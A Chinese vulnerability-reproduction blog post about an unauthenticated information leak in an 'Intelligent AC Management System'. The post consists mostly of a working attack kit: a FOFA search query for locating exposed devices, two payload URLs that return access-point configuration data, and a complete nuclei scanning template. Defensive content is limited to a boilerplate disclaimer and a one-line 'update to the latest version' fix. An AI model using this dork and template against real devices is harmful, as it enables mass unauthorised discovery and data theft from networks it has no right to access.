智能AC管理系统信息泄露漏洞

文章目录

免责声明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

漏洞描述

智能AC管理系统是一个控制管理系统因存在未授权访问导致信息泄露

搜索语法

fofa

复制代码
header="HTTPD_ac 1.0" 

漏洞复现

payload

复制代码
http://ip/actpt.data

payload

复制代码
http://ip/actpt_5g.data

yaml

yaml 复制代码
id: intelligent-AC-Manage-system-Information-breaches

info: 
 name: 智能AC管理系统信息泄露漏洞
 author: xl
 description: information breaches
 severity: high

http: 
  - raw: 
      - |+
         GET /actpt.data HTTP/1.1
         Host: {{Hostname}} 
         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
  - raw: 
      - |+
         GET /actpt_5g.data HTTP/1.1
         Host: {{Hostname}} 
         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36

matchers-condition: and
matchers: 
  - type: word
    part: body
    words: 
      - 'ap_name'
  - type: status
    status:
      - 200

修复建议

更新到最新版本

相关推荐
菩提小狗2 小时前
每日安全情报报告 · 2026-07-03
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗7 小时前
每日安全情报报告 · 2026-07-01
网络安全·漏洞·cve·安全情报·每日安全
见青..19 天前
文件上传漏洞之原理、探测、利用、绕过、防御
web安全·网络安全·漏洞·文件上传
网络研究院20 天前
网络研究观-严重漏洞允许以 root 用户身份执行任意命令:CVE-2026-0273 分析
网络·安全·漏洞·修复·设备
阿昭L22 天前
Windows堆dword shoot
windows·安全·漏洞·堆溢出
南山丶无梅落23 天前
文件上传漏洞2
漏洞·文件上传·网安·条件竞争·二次渲染·0x00截断·图片马
菩提小狗1 个月前
每日安全情报报告 · 2026-06-04
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗1 个月前
每日安全情报报告 · 2026-06-03
网络安全·漏洞·cve·安全情报·每日安全
南山丶无梅落1 个月前
XXE漏洞
xml·漏洞·xxe·网安
菩提小狗1 个月前
每日安全情报报告 · 2026-06-02
网络安全·漏洞·cve·安全情报·每日安全